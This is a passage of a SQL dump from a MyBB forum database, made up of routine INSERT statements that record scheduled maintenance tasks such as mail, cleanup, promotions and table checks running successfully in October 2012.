`dateline`, `data`) VALUES ('13149', '5', '1351357485', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13150', '9', '1351357752', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13151', '3', '1351357758', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13152', '1', '1351358520', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13153', '7', '1351358522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13154', '5', '1351358628', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13155', '9', '1351358873', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13156', '5', '1351358895', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13157', '3', '1351359121', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13158', '9', '1351359941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13159', '5', '1351359947', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13160', '9', '1351362292', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13161', '3', '1351362967', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13162', '1', '1351363009', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13163', '7', '1351363022', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13164', '5', '1351363028', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13165', '9', '1351363184', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13166', '9', '1351363702', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13167', '5', '1351363706', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13168', '9', '1351364770', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13169', '3', '1351364781', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13170', '1', '1351364792', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13171', '7', '1351364803', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13172', '5', '1351364814', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13173', '9', '1351365022', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13174', '5', '1351365909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13175', '9', '1351365932', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13176', '3', '1351366215', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13177', '9', '1351366817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13178', '5', '1351367105', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13179', '9', '1351367713', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13180', '3', '1351367947', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13181', '1', '1351368003', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13182', '7', '1351368014', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13183', '5', '1351368310', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13184', '9', '1351368621', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13185', '5', '1351369507', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13186', '9', '1351369530', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13187', '3', '1351369921', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13188', '9', '1351370792', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13189', '5', '1351370797', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13190', '9', '1351371463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13191', '3', '1351372777', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13192', '1', '1351372919', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13193', '7', '1351372924', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13194', '5', '1351372937', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13195', '9', '1351373346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13196', '5', '1351373621', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13197', '3', '1351373630', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13198', '9', '1351374392', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13199', '5', '1351374396', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13200', '9', '1351377324', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13201', '3', '1351377369', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13202', '1', '1351377461', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13203', '7', '1351377782', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13204', '5', '1351377789', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13205', '9', '1351378581', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13206', '5', '1351378589', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13207', '3', '1351379229', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13208', '1', '1351379240', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13209', '7', '1351379278', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13210', '5', '1351379583', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13211', '9', '1351379710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13212', '5', '1351383224', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13213', '9', '1351384010', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13214', '3', '1351384072', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13215', '1', '1351384082', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13216', '2', '1351384086', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13217', '7', '1351384088', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13218', '11', '1351384096', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13219', '5', '1351384119', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13220', '3', '1351384202', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13221', '9', '1351385417', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13222', '5', '1351385540', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13223', '9', '1351386664', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13224', '3', '1351386682', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13225', '1', '1351386705', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13226', '7', '1351386802', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13227', '5', '1351386810', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13228', '5', '1351387513', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13229', '9', '1351387527', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13230', '3', '1351387805', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13231', '5', '1351388415', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13232', '9', '1351389527', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13233', '5', '1351389547', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13234', '3', '1351389559', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13235', '1', '1351389689', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13236', '7', '1351390076', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13237', '5', '1351390082', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13238', '5', '1351390129', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13239', '9', '1351390297', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13240', '5', '1351391109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13241', '9', '1351391129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13242', '3', '1351391424', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13243', '9', '1351392596', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13244', '5', '1351392612', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13245', '9', '1351393880', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13246', '3', '1351393882', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13247', '1', '1351393963', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13248', '7', '1351393971', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13249', '5', '1351393973', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13250', '5', '1351394716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13251', '9', '1351394731', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13252', '3', '1351395003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13253', '9', '1351396033', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13254', '5', '1351396111', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13255', '9', '1351398253', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13256', '3', '1351398266', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13257', '1', '1351398582', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13258', '7', '1351398601', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13259', '5', '1351398690', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13260', '9', '1351399186', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13261', '3', '1351399275', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13262', '9', '1351402398', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13263', '5', '1351402862', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13264', '3', '1351402914', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13265', '1', '1351402917', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13266', '7', '1351403062', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13267', '9', '1351403746', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13268', '5', '1351403749', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13269', '3', '1351404030', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13270', '1', '1351404031', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13271', '7', '1351405459', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13272', '5', '1351406755', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13273', '9', '1351406784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13274', '3', '1351406788', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13275', '9', '1351407315', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13276', '3', '1351409843', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13277', '1', '1351409855', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13278', '7', '1351409856', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13279', '5', '1351409858', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13280', '9', '1351410531', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13281', '5', '1351410598', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13282', '9', '1351413776', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13283', '3', '1351414810', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13284', '1', '1351414865', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13285', '7', '1351414873', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13286', '5', '1351414924', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13287', '9', '1351414958', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13288', '5', '1351415135', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13289', '9', '1351420641', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13290', '5', '1351420652', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13291', '3', '1351420661', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13292', '1', '1351420670', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13293', '7', '1351420674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13294', '9', '1351421163', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13295', '5', '1351421232', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13296', '9', '1351422004', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13297', '3', '1351422019', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13298', '1', '1351422033', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13299', '7', '1351422046', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13300', '5', '1351422982', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13301', '9', '1351425561', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13302', '5', '1351425591', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13303', '3', '1351425674', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13304', '1', '1351425683', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13305', '4', '1351425901', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13306', '7', '1351425909', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13307', '5', '1351426068', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13308', '9', '1351426259', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13309', '5', '1351428252', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13310', '9', '1351429193', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13311', '3', '1351429204', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13312', '5', '1351429239', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13313', '1', '1351430620', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13314', '7', '1351430632', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13315', '5', '1351430655', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13316', '9', '1351430683', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13317', '5', '1351430724', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13318', '9', '1351430816', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13319', '3', '1351432915', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13320', '9', '1351432994', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13321', '5', '1351433143', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13322', '1', '1351433159', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13323', '7', '1351433169', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13324', '9', '1351433588', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13325', '5', '1351434459', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13326', '9', '1351434574', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13327', '3', '1351434610', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13328', '9', '1351435380', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13329', '5', '1351435531', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13330', '9', '1351436387', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13331', '3', '1351436438', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13332', '1', '1351436620', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13333', '7', '1351437094', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13334', '5', '1351438481', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13335', '9', '1351438991', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13336', '3', '1351439017', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13337', '5', '1351439118', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13338', '9', '1351439817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13339', '3', '1351439960', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13340', '1', '1351440079', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13341', '7', '1351440140', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13342', '5', '1351440333', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13343', '9', '1351440813', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13344', '5', '1351441919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13345', '9', '1351442394', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13346', '3', '1351442430', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13347', '9', '1351443594', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13348', '5', '1351443763', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13349', '3', '1351443792', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13350', '1', '1351443810', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13351', '7', '1351443823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13352', '5', '1351444311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13353', '9', '1351444413', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` 